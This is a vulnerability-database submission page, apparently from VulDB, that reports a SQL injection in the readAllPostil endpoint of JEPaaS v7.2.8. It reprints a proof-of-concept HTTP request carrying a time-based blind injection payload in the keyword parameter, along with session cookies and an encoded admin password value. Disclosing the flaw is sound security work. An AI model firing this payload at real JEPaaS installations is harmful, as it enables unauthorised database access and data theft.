Submeter #707178: JEPaaS v7.2.8 SQL Injectioninformação

TítuloJEPaaS v7.2.8 SQL Injection
Descriçãohttps://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md The /je/postil/postil/readAllPostil interface in JEPaaS uses string concatenation in SQL statements, resulting in a SQL injection vulnerability The request is as follows: POST /je/postil/postil/readAllPostil?keyword=%25'+AND+IF(LENGTH(database())=6,SLEEP(2),0)+AND+'%25'%3d' HTTP/1.1 Host: Cookie: je-local-lang=zh_CN; JSESSIONID=BDFF4DEC4216AE260303D79CBE35CA06; phone=admin; password=TVRJeg==; authorization=TIUxAb8r8IilqFzx9Xg Content-Type: application/json; charset=utf-8 Content-Length: 2 {}
Fonte⚠️ https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md
Utilizador
 c3p0ooo_Yiqiyin (UID 44113)
Submissão05/12/2025 10h44 (há 5 meses)
Moderação14/12/2025 13h09 (9 days later)
EstadoAceite
Entrada VulDB336412 [ketr JEPaaS até 7.2.8 readAllPostil keyWord Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Do you want to use VulDB in your project?

Use the official API to access entries easily!